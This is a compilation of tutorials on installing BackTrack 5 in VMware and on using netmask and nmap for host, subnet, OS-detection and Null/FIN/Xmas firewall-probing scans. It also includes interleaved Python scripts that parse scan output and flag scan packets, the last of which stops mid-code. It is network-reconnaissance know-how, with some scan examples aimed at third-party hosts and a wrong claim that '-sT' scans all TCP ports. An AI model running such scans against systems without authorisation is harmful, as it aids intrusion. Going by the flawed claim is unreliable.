Dear Readers,

R3 on VMware workstation 8.

We would also like to thank our friends from PenTest Magazine. We appreciate their help and we would like to invite you to visit their website pentestmag.com.

How to Install Backtrack 5 R3 on VMware Workstation

by Rrajesh Kumar

This article shows how to install BackTrack 5. This time the installation is done in a virtual machine (VMware).

Step 1.

Go to File and click on New Virtual Machine (Figure 1).

[Screenshot: VMware Workstation File menu (New Virtual Machine... Ctrl+N, New Window, Open... Ctrl+O, Close Tab Ctrl+W, Connect to Server... Ctrl+L, Virtualize a Physical Machine..., Export to OVF..., Map Virtual Disks..., Exit); New Virtual Machine... is marked "Click Here".]

Figure 1. Creating a new virtual machine

Step 2.

Select Typical and click Next (Figure 2).

[Screenshot: New Virtual Machine Wizard, "What type of configuration do you want?". Typical (recommended) creates a Workstation 8.0 virtual machine in a few easy steps; Custom (advanced) creates a virtual machine with advanced options such as a SCSI controller type, virtual disk type and compatibility with older VMware products. Typical is marked "Click Here"; buttons: Help, Next >, Cancel.]

Figure 2. Selecting the type of configuration
Step 3.

Select DVD drive or ISO and click Next (Figure 3).

[Screenshot: Guest Operating System Installation page. "A virtual machine is like a physical computer; it needs an operating system. How will you install the guest operating system?" Under "Install from:" choose "Installer disc" (DVD RW Drive (F:)) if you have the BackTrack OS on a disc, or "Installer disc image file (iso)" and click Browse if you have the ISO file on your hard disk. In the file dialog that opens, first select the BT5 ISO file (File name: BT5R3-KDE-32, file type: CD-ROM images (*.iso)) and then click Open.]

Figure 3. Selecting the information source



Step 4.

Click on Next (Figure 4).

[Screenshot: Guest Operating System Installation page with "Installer disc image file (iso)" set to D:\Raj1\Operating Systems\BT5R3-KDE-32.iso. The wizard warns: "Could not detect which operating system is in this disc image. You will need to specify which operating system will be installed." The third option, "I will install the operating system later" (the virtual machine will be created with a blank hard disk), is left unselected. Buttons: Help, < Back, Next >, Cancel.]

Figure 4. Continuing installation

Step 5.

Select Linux, choose your OS version (Ubuntu), and click Next (Figure 5).

[Screenshot: Select a Guest Operating System page, "Which operating system will be installed on this virtual machine?". Guest operating system: Microsoft Windows, Linux (selected), Novell NetWare, Sun Solaris, VMware ESX, Other. Version: Ubuntu. Buttons: Help, < Back, Next >, Cancel.]

Figure 5. Specifying the OS that will be installed



Step 6.

You can change the virtual machine name and choose where you want to install your OS (Figure 6).

[Screenshot: Name the Virtual Machine page, "What name would you like to use for this virtual machine?". Virtual machine name: Ubuntu. Location: D:\back, with a Browse... button (marked "Click Here"; if you want to change the location, click Browse). The default location can be changed at Edit > Preferences. Buttons: < Back, Next >, Cancel.]

Figure 6. Setting the name and installation path
Step 7.

Change your OS installation disk size (it should be more than 20 GB) and click Next (Figure 7).

[Screenshot: Specify Disk Capacity page, "How large do you want this disk to be?". "The virtual machine's hard disk is stored as one or more files on the host computer's physical disk. These file(s) start small and become larger as you add applications, files, and data to your virtual machine." Maximum disk size (GB): 11.0. Recommended size for Ubuntu: 20 GB. Options: Store virtual disk as a single file / Split virtual disk into multiple files (selected); splitting the disk makes it easier to move the virtual machine to another computer but may reduce performance with very large disks. Annotations: 1. You can resize your disk; 2. Click Next.]

Figure 7. Changing installation disk size

Step 8.

Click on Finish (Figure 8).

[Screenshot: Ready to Create Virtual Machine page. "Click Finish to create the virtual machine and start installing Ubuntu." The virtual machine will be created with the following settings: Name: Ubuntu; Location: D:\back; Version: Workstation 8.0; Operating System: Ubuntu; Hard Disk: 11 GB, Split; Memory: 1024 MB. Annotations: 1. If you want to customize hardware, click Customize Hardware...; 2. Click Finish. "Power on this virtual machine after creation" is ticked. Buttons: < Back, Finish, Cancel.]

Figure 8. Ready to create the VM
Step 9.

Select Text Mode and hit Enter (Figure 9).

[Screenshot: BackTrack Live CD boot menu: BackTrack Text - Default Boot Text Mode (select this and press Enter); BackTrack Stealth - No Networking enabled; BackTrack Forensics - No Drive or Swap Mount; BackTrack noDRM - No DRM Drivers; BackTrack Debug - Safe Mode; BackTrack Memtest - Run memtest; Hard Drive Boot - boot the first hard disk. Press [Tab] to edit options.]

Figure 9. Boot mode select

Step 10.

After booting your ISO, a screen similar to Figure 10 will show. Type startx and hit Enter.

[Screenshot: kernel boot messages (sd 2:0:0:0: [sda] Attached SCSI disk; USB hub with 7 ports found; VMware Virtual USB Mouse registered as input2 and input3; usbcore: registered new interface driver usbhid), followed by:
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
System information disabled due to load higher than 1.0
root@bt:~# startx]

Figure 10. Screen visible after booting.



Step 11.

Loading (Figure 11).

Figure 11. Loading
Step 12.

Right click on the Install BackTrack icon and click Open (Figure 12).

Figure 12. Opening installation



Step 13.

Click Forward (Figure 13).

[Screenshot: installer welcome page, Step 1 of 7, with a language list on the left (Espanol, Esperanto, Euskara, Francais, Gaeilge, Galego, Hrvatski, ..., Latviski, Lietuviskai, Magyar, ...). Text: "Ready to install? Once you answer a few questions, the contents of the live CD can be installed on this computer so you can run BackTrack Live at full speed without the CD. Answering the questions should only take a few minutes." Button: Forward.]

Figure 13. Step 1 - starting installation
Step 14.

Click Forward (Figure 14).

Figure 14. Choosing your location

Step 15.

Click Forward (Figure 15).

Figure 15. Keyboard layout selection
Step 16.

Here we choose Erase and use the entire disk, because we have created a separate partition for our BT OS installation. This is fine for installing an OS on VMware. Click on Forward (Figure 16).

[Screenshot: Prepare disk space page. "This computer has no operating systems on it. Where do you want to put BackTrack Live?" Options: Erase and use the entire disk (selected; SCSI3 (0,0,0)) / Specify partitions manually.]

Figure 16. Preparing disk space



Step 17.

Click on Install (Figure 17).

[Screenshot: Ready to install page. "Your new operating system will now be installed with the following settings:" followed by the settings summary. Button: Install.]

Figure 17. Ready to install
Step 18.

Installation starts (Figure 18).

Figure 18. Installation starts

Step 19.

Installation completed. Click on Restart Now (Figure 19).

[Screenshot: Installation Complete dialog. "Installation has finished. You can continue testing Ubuntu now, but until you restart the computer, any changes you make or documents you save will not be preserved." Buttons: Continue Testing / Restart Now.]

Figure 19. Installation complete



Step 20.

Now log in as root and hit Enter. Our password will be toor (Figure 20).

[Screenshot: boot messages (sda: sda1 sda2 < sda5 >; sd 2:0:0:0: [sda] Attached SCSI disk; VMware Virtual USB Mouse detected; usbhid: USB HID core driver), then Metasploit's database being started by /opt/metasploit/postgresql/scripts/ctl.sh (postgresql started; LOG: database system was shut down at 2012-08-10 20:24:34 IST; LOG: database system is ready to accept connections), then the login prompt:
BackTrack 5 R3 - 32 Bit bt tty1
bt login: root
Password:]

Figure 20. Setting login and password
Step 21.

Write startx and hit Enter (Figure 21).

[Screenshot:
BackTrack 5 R3 - 32 Bit bt tty1
bt login: root
Password:
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686
System information as of Sat Jun 1 20:11:11 IST (System load: 0.42; Usage of /: 57.5% of 19.06GB; Memory usage: 2%; Swap usage: 0%; Processes, Users logged in and IP address for eth0 cut off)
Graph this data and manage this system at https://le...
root@bt:~# startx]

Figure 21. startx



Step 22.

Now right click and delete the installation icon from your desktop (Figure 22).

Figure 22. Deleting the installation icon
How to Use Netmask in Kali Linux

by Rrajesh Kumar

Netmask is another simple tool which does one thing: it makes an ICMP netmask request. By determining the netmasks of various computers on a network, you can better map your subnet structure (www.question-defense.com).

Step 1. How to open

A. GUI Method (Figure 1).

Applications -> Kali Linux -> Information Gathering -> Route Analysis -> netmask

[Screenshot: Kali Linux application menu. Kali Linux > Information Gathering > Route Analysis lists 0trace, dnmap-client, dnmap-server, intrace, netmask (marked "Click Here"), ... The other Information Gathering submenus are DNS Analysis, IDS/IPS Identification, Live Host Identification, Network Scanners, OS Fingerprinting, OSINT Analysis, Service Fingerprinting, SMB Analysis, SMTP Analysis, SNMP Analysis, SSL Analysis, Telephony Analysis, Traffic Analysis, VoIP Analysis and VPN Analysis.]

Figure 1. Opening netmask in the GUI

B. Open the terminal and type netmask -h. This command will open netmask with its help options (Figure 2).

root@MrQuiety:~# netmask -h
This is netmask, an address netmask generation utility
Usage: netmask spec [spec ...]
  -h, --help        Print a summary of the options
  -v, --version     Print the version number
  -d, --debug       Print status/progress information
  -s, --standard    Output address/netmask pairs
  -c, --cidr        Output CIDR format address lists
  -i, --cisco       Output Cisco style address lists
  -r, --range       Output ip address ranges
  -x, --hex         Output address/netmask pairs in hex
  -o, --octal       Output address/netmask pairs in octal
  -b, --binary      Output address/netmask pairs in binary
  -n, --nodns       Disable DNS lookups for addresses
Definitions:
  a spec can be any of:
    address
    address:address
    address:+address
    address/mask
  an address can be any of:
    N       decimal number
    0N      octal number
    0xN     hex number

Figure 2. Opening netmask in the terminal
Step 2.

-v - this option is used to see the netmask version installed on your system (Figure 3).

Syntax - netmask -v

root@MrQuiety:~# netmask -v
netmask, version 2.3.7

Figure 3. Checking the netmask version



Step 3.

This is the default search for a domain or IP (Figure 4).

Syntax - netmask domain/IP
Example - netmask google.com
Example - netmask 192.168.237.129

root@MrQuiety:~# netmask google.com
74.125.236.73/32
root@MrQuiety:~# netmask 192.168.237.129
192.168.237.129/32

Figure 4. Search for domain or IP
Step 4.

Output address/netmask pairs (Figure 5).

Syntax - netmask -s domain/IP
Example - netmask -s google.com
Example - netmask -s 192.168.237.129

root@MrQuiety:~# netmask -s google.com
74.125.236.192/255.255.255.255
root@MrQuiety:~# netmask -s 192.168.237.129
192.168.237.129/255.255.255.255

Figure 5. Output address/netmask pairs
Step 5.

Output CIDR format address lists (Figure 6).

Syntax - netmask -c domain/IP
Example - netmask -c google.com
Example - netmask -c 192.168.237.129

root@MrQuiety:~# netmask -c google.com
74.125.236.65/32
root@MrQuiety:~# netmask -c 192.168.237.129
192.168.237.129/32

Figure 6. Output CIDR format address lists



Step 6.

Output Cisco style address lists (Figure 7).

Syntax - netmask -i domain/IP
Example - netmask -i google.com
Example - netmask -i 192.168.237.129

root@MrQuiety:~# netmask -i google.com
74.125.236.67 0.0.0.0
root@MrQuiety:~# netmask -i 192.168.237.129
192.168.237.129 0.0.0.0

Figure 7. Output Cisco style address lists



Step 7.

Output IP address ranges (Figure 8).

Syntax - netmask -r domain/IP
Example - netmask -r google.com
Example - netmask -r 192.168.237.129

root@MrQuiety:~# netmask -r google.com
74.125.236.174-74.125.236.174 (1)
root@MrQuiety:~# netmask -r 192.168.237.129
192.168.237.129-192.168.237.129 (1)

Figure 8. Output IP address ranges



root@MrQuiety:~# netmask -x google.com
0x4a7dec67/0xffffffff
root@MrQuiety:~# netmask -x 192.168.237.129
0xc0a8ed81/0xffffffff

Figure 9. Output address/netmask pairs in hex



root@MrQuiety:~# netmask -o google.com
011237366107/037777777777
root@MrQuiety:~# netmask -o 192.168.237.129
030052166601/037777777777

Figure 10. Output address/netmask pairs in octal



root@MrQuiety:~# netmask -b google.com
01001010 01111101 11101100 11000000 / 11111111 11111111 11111111 11111111
root@MrQuiety:~# netmask -b 192.168.237.129
11000000 10101000 11101101 10000001 / 11111111 11111111 11111111 11111111

Figure 11. Output address/netmask pairs in binary
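The output formats listed in the help text and shown in Figures 4 to 11 are plain re-encodings of an address and its mask, so they can be reproduced offline to check a result or to convert a range into CIDR blocks when the tool is not installed. The script below is an added example, not the netmask tool's own code: it uses Python's standard ipaddress module, supports the spec shapes address, address/mask and address:address (the address:+address form is left out), and performs no DNS lookups, so pass an already resolved IP the way the -n option would require.

```python
# Added example (not part of the article and not the netmask tool's own
# source): reproduces the output formats from "netmask -h" with Python's
# ipaddress module. Supported spec shapes: address, address/mask and
# address:address. No DNS lookups are performed, so hostnames are rejected.
import ipaddress
from typing import Callable, Dict, List


def parse_spec(spec: str) -> List[ipaddress.IPv4Network]:
    """Turn one spec into the list of networks it denotes.

    address:address is an inclusive range, collapsed into the smallest set
    of CIDR blocks that covers it. A bare address is a single host (/32).
    """
    if ":" in spec:
        lo, hi = spec.split(":", 1)
        return list(ipaddress.summarize_address_range(
            ipaddress.IPv4Address(lo), ipaddress.IPv4Address(hi)))
    if "/" in spec:
        # strict=False lets "74.125.236.73/24" mean the /24 that contains it
        return [ipaddress.IPv4Network(spec, strict=False)]
    return [ipaddress.IPv4Network(spec + "/32")]


def _octets_bin(addr: ipaddress.IPv4Address) -> str:
    """Dotted-quad address as four space-separated 8-bit groups."""
    return " ".join(f"{o:08b}" for o in addr.packed)


# One formatter per output option; keys are the short flags from netmask -h.
FORMATS: Dict[str, Callable[[ipaddress.IPv4Network], str]] = {
    "-s": lambda n: f"{n.network_address}/{n.netmask}",            # standard
    "-c": lambda n: f"{n.network_address}/{n.prefixlen}",          # cidr
    "-i": lambda n: f"{n.network_address} {n.hostmask}",           # cisco wildcard
    "-r": lambda n: f"{n[0]}-{n[-1]} ({n.num_addresses})",         # range
    "-x": lambda n: f"0x{int(n.network_address):08x}/0x{int(n.netmask):08x}",
    "-o": lambda n: f"0{int(n.network_address):011o}/0{int(n.netmask):011o}",
    "-b": lambda n: f"{_octets_bin(n.network_address)} / {_octets_bin(n.netmask)}",
}


def netmask(spec: str, flag: str = "-c") -> List[str]:
    """Format every network in `spec` the way `netmask <flag> <spec>` prints it."""
    return [FORMATS[flag](n) for n in parse_spec(spec)]


if __name__ == "__main__":
    for flag in FORMATS:
        print(flag, netmask("192.168.237.129", flag))
    # A range that is not a single block is where the tool is most useful:
    # 1-130 needs nine CIDR blocks, and each one is printed separately.
    print("-c", netmask("192.168.237.1:192.168.237.130", "-c"))
```

Running it with 192.168.237.129 gives the same seven lines the figures show for that host; the range call at the end shows why a tool like this matters when writing firewall or ACL entries, since an address range that looks simple in decimal rarely maps to one CIDR block.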






How to Use Nmap in Kali Linux 

by Rrajesh Kumar 

Nmap ("Network Mapper") is an open source tool for network exploration and security 
auditing. It was designed to rapidly scan large networks, although it works fine against single 
hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the 
network, what services (application name and version) those hosts are offering, what operating 
systems (and OS versions) they are running, what type of packet filters/firewalls are in use, 
and dozens of other characteristics. While Nmap is commonly used for security audits, many 
systems and network administrators find it useful for routine tasks such as network inventory, 
managing service upgrade schedules, and monitoring host or service uptime (nmap.org). 

Step 1. How to open nmap

A. GUI method (Figure 1).

Applications -> Information Gathering -> DNS Analysis -> nmap
Figure 1. Opening nmap in the GUI

B. Open the terminal, type nmap, and hit Enter (Figure 2).

root@MrQuiety:~# nmap
Nmap 6.25 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL <inputfilename>: Input from list of hosts/networks
  -iR <num hosts>: Choose random targets
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
HOST DISCOVERY:
  -sL: List Scan - simply list targets to scan
  -sn: Ping Scan - disable port scan
  -Pn: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  -PO[protocol list]: IP Protocol Ping
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
  --system-dns: Use OS's DNS resolver
  --traceroute: Trace hop path to each host
SCAN TECHNIQUES:
  ...

Figure 2. Opening nmap in the terminal
Step 2.

Scan a single IP address when the firewall is OFF/ON on the target PC (Figure 3).

Syntax - nmap IP address/hostname
Example - nmap 192.168.237.129
Example - nmap google.com

root@MrQuiety:~# nmap 192.168.237.129
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:07 IST
Nmap scan report for 192.168.237.129
Host is up (0.0013s latency).
Not shown: 996 closed ports                [target PC's firewall OFF]
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.27 seconds

root@MrQuiety:~# nmap 192.168.237.129
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:07 IST
Nmap scan report for 192.168.237.129
Host is up (0.00098s latency).
Not shown: 999 filtered ports              [target PC's firewall ON]
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.14 seconds

Figure 3. Scanning a single IP address with the firewall ON/OFF



Step 3.

Boost up your nmap scan - using this option you can decrease scan time (Figure 4).

Syntax - nmap -F IP address
Example - nmap -F 192.168.237.129

root@MrQuiety:~# nmap 192.168.237.129                    [Normal Scan]
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:08 IST
Nmap scan report for 192.168.237.129
Host is up (0.0011s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.63 seconds

root@MrQuiety:~# nmap -F 192.168.237.129                 [Fast Scan]
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:09 IST
Nmap scan report for 192.168.237.129
Host is up (0.0012s latency).
Not shown: 96 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.7 seconds

Figure 4. Decreasing scan time
Step 4.

Scan multiple IP addresses or a subnet.

A. Scan a range of IP addresses (Figure 5).

Syntax - nmap IP address range
Example - nmap 192.168.237.1-130

root@MrQuiety:~# nmap 192.168.237.1-130
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:10 IST
Nmap scan report for 192.168.237.1
Host is up (0.0013s latency).
All 1000 scanned ports on 192.168.237.1 are filtered
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.237.2
Host is up (0.00074s latency).
Not shown: 999 closed ports
PORT   STATE    SERVICE
53/tcp filtered domain
MAC Address: 00:50:56:ED:D4:DE (VMware)

Nmap scan report for 192.168.237.128
Host is up (0.000020s latency).
All 1000 scanned ports on 192.168.237.128 are closed

Nmap scan report for 192.168.237.129
Host is up (0.0012s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B0:E3:F3 (VMware)

Nmap done: 130 IP addresses (4 hosts up) scanned in 11.86 seconds

Figure 5. Scanning a range of IPs

B. Scan a range of IP addresses using a wildcard (Figure 6).

Example - nmap 192.168.237.*

root@MrQuiety:~# nmap 192.168.237.*
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:12 IST
Nmap scan report for 192.168.237.1
Host is up (0.0073s latency).
All 1000 scanned ports on 192.168.237.1 are filtered
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.237.2
Host is up (0.00070s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:ED:D4:DE (VMware)

Nmap scan report for 192.168.237.128
Host is up (0.000021s latency).
All 1000 scanned ports on 192.168.237.128 are closed

Nmap scan report for 192.168.237.129
Host is up (0.0010s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B0:E3:F3 (VMware)

Figure 6. Scanning a range of IPs using wildcard
C. Scan an entire subnet (Figure 7).

Example - nmap 192.168.237.0/24

root@MrQuiety:~# nmap 192.168.237.0/24
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:13 IST
Nmap scan report for 192.168.237.1
Host is up (0.0058s latency).
All 1000 scanned ports on 192.168.237.1 are filtered
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.237.2
Host is up (0.00091s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:ED:D4:DE (VMware)

Nmap scan report for 192.168.237.128
Host is up (0.000020s latency).
All 1000 scanned ports on 192.168.237.128 are closed

Nmap scan report for 192.168.237.129
Host is up (0.0014s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B0:E3:F3 (VMware)

Figure 7. Scanning entire subnet
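The subnet scans in Figures 5 to 7 are exactly the "network inventory" use that the nmap.org description above mentions, and an administrator gets the most out of them by comparing each run against a record of what is supposed to be listening. The following Python script is an added example, not part of the article and not nmap's own code: it parses nmap's normal output (the format the figures show, with an optional VERSION column as produced by -sV) into a per-host inventory and reports deviations from an assumed baseline. The transcript it parses is constructed from the figures, and the baseline is a made-up record standing in for whatever an administrator has documented.

```python
# Added example (not from the article, not nmap's own code): parse nmap's
# normal output into a per-host inventory and compare it with an expected
# baseline. SAMPLE_OUTPUT is constructed from the figures in the article;
# BASELINE is an assumed record of what should be listening.
import re
from typing import Dict, List, Optional, Set, Tuple

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-F:]{17})")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

SAMPLE_OUTPUT = """\
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:13 IST
Nmap scan report for 192.168.237.2
Host is up (0.00091s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:ED:D4:DE (VMware)
Nmap scan report for 192.168.237.128
Host is up (0.000020s latency).
All 1000 scanned ports on 192.168.237.128 are closed
Nmap scan report for 192.168.237.129
Host is up (0.0014s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Nmap done: 256 IP addresses (3 hosts up) scanned in 12.00 seconds
"""

# Assumed baseline: the TCP ports each host is supposed to expose.
BASELINE: Dict[str, Set[int]] = {
    "192.168.237.2": {53},
    "192.168.237.129": {135, 139, 445},   # RDP (3389) is not approved here
}


def parse_nmap(text: str) -> Dict[str, Dict]:
    """Return {host: {"mac": str|None, "ports": {(port, proto): info}}}."""
    hosts: Dict[str, Dict] = {}
    current: Optional[Dict] = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = hosts.setdefault(m.group(1), {"mac": None, "ports": {}})
            continue
        if current is None:
            continue                      # header lines before the first host
        m = MAC_RE.match(line)
        if m:
            current["mac"] = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current["ports"][(int(port), proto)] = {
                "state": state, "service": service,
                "version": (version or "").strip()}
    return hosts


def open_ports(hosts: Dict[str, Dict], host: str, proto: str = "tcp") -> Set[int]:
    """Ports reported plainly open (not open|filtered) for one host/protocol."""
    entries = hosts.get(host, {"ports": {}})["ports"]
    return {p for (p, pr), info in entries.items()
            if pr == proto and info["state"] == "open"}


def diff_against_baseline(hosts: Dict[str, Dict],
                          baseline: Dict[str, Set[int]]
                          ) -> List[Tuple[str, Optional[int], str]]:
    """Findings as (host, port, reason): unexpected listeners, missing
    services, and hosts with open ports that the baseline does not know."""
    findings: List[Tuple[str, Optional[int], str]] = []
    for host, expected in baseline.items():
        seen = open_ports(hosts, host)
        findings += [(host, p, "unexpected open port") for p in sorted(seen - expected)]
        findings += [(host, p, "expected service missing") for p in sorted(expected - seen)]
    for host in hosts:
        if host not in baseline and open_ports(hosts, host):
            findings.append((host, None, "host not in baseline"))
    return findings


if __name__ == "__main__":
    inventory = parse_nmap(SAMPLE_OUTPUT)
    for finding in diff_against_baseline(inventory, BASELINE):
        print(finding)
```

On the constructed transcript the only finding is the unapproved 3389/tcp listener on 192.168.237.129; a host that answers but has no open ports (192.168.237.128 above) is deliberately not reported, so that idle machines do not drown out real changes. For anything beyond a one-off check, run nmap with -oX and parse the XML instead of the human-readable form, since the normal output is not a stable interface.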



Step 5.

This option is used for OS and version detection (Figure 8).

Example - nmap -O 192.168.237.129

root@MrQuiety:~# nmap -O 192.168.237.129
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:14 IST
Nmap scan report for 192.168.237.129
Host is up (0.00096s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.88 seconds

Figure 8. Scanning OS and its version
Step 6.

Scan all TCP ports in the target IP (Figure 9).

Example - nmap -sT 192.168.237.129

root@MrQuiety:~# nmap -sT 192.168.237.129
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:15 IST
Nmap scan report for 192.168.237.129
Host is up (0.0016s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds

Figure 9. Scanning all TCP ports in target IP



Step 7.

Scan a firewall for security weakness.

A. Null scan - use a TCP Null scan to fool a firewall into generating a response (Figure 10).

Example - nmap -sN 192.168.237.129

B. FIN scan - use a TCP FIN scan to check the firewall (Figure 10).

Example - nmap -sF 192.168.237.129

C. Use a TCP Xmas scan to check the firewall (Figure 10).

Example - nmap -sX 192.168.237.129

root@MrQuiety:~# nmap -sN 192.168.237.129                  [A]
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:16 IST
Nmap scan report for 192.168.237.129
Host is up (0.0011s latency).
All 1000 scanned ports on 192.168.237.129 are closed
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds

root@MrQuiety:~# nmap -sF 192.168.237.129                  [B]
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:16 IST
Nmap scan report for 192.168.237.129
Host is up (0.0010s latency).
All 1000 scanned ports on 192.168.237.129 are closed
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.77 seconds

root@MrQuiety:~# nmap -sX 192.168.237.129                  [C]
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:16 IST
Nmap scan report for 192.168.237.129
Host is up (0.0011s latency).
All 1000 scanned ports on 192.168.237.129 are closed
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds

Figure 10. Null, TCP FIN, and TCP Xmas scans
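The three scans in Figure 10 differ only in the TCP flag byte they send, and that byte is also what makes them easy to pick out on the wire: no legitimate client ever opens a connection with no flags, with FIN alone, or with FIN, PSH and URG together. The following Python script is an added example, not from the article: it classifies TCP segments by their flag bits using the Null, FIN and Xmas definitions from the nmap documentation (-sN sends no flags, -sF sends FIN only, -sX sets FIN, PSH and URG) and raises a simple port-scan alert per source and destination pair. The packet records are constructed, not captured, and the port threshold is an assumption to tune per network.

```python
# Added example (not from the article): classify TCP probes by their flag
# bits and raise a crude port-scan alert. The probe definitions follow the
# nmap documentation for -sN, -sF and -sX (no flags, FIN only, FIN+PSH+URG).
# SAMPLE_PACKETS is constructed, not captured; port_threshold is assumed.
from collections import defaultdict
from typing import Dict, List, Tuple

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# (timestamp, src, dst, dport, tcp_flags) - constructed sample traffic
Packet = Tuple[float, str, str, int, int]
SAMPLE_PACKETS: List[Packet] = (
    # a Null scan walking ports 1-12 on the Windows host from Figure 10
    [(1.0 + i * 0.01, "192.168.237.128", "192.168.237.129", p, 0)
     for i, p in enumerate(range(1, 13))]
    # followed by two Xmas probes from the same source
    + [(2.0, "192.168.237.128", "192.168.237.129", 80, FIN | PSH | URG),
       (2.1, "192.168.237.128", "192.168.237.129", 443, FIN | PSH | URG)]
    # and an ordinary client opening RDP and SMB with normal SYNs
    + [(3.0, "192.168.237.5", "192.168.237.129", 3389, SYN),
       (3.1, "192.168.237.5", "192.168.237.129", 445, SYN)]
)


def classify_flags(flags: int) -> str:
    """Name the probe type that a TCP segment's flag byte corresponds to."""
    if flags == 0:
        return "null-probe"          # -sN: no flags at all
    if flags == FIN:
        return "fin-probe"           # -sF: FIN without ACK
    if flags == FIN | PSH | URG:
        return "xmas-probe"          # -sX: FIN, PSH and URG together
    if flags == SYN:
        return "syn"                 # normal connection attempt (also -sS/-sT)
    if flags & SYN and flags & ACK:
        return "syn-ack"
    if flags & ACK:
        return "ack"                 # established traffic, but also -sA/-sW probes
    return "other"


# Flag combinations that real TCP stacks never use to start a conversation.
MALFORMED = {"null-probe", "fin-probe", "xmas-probe"}


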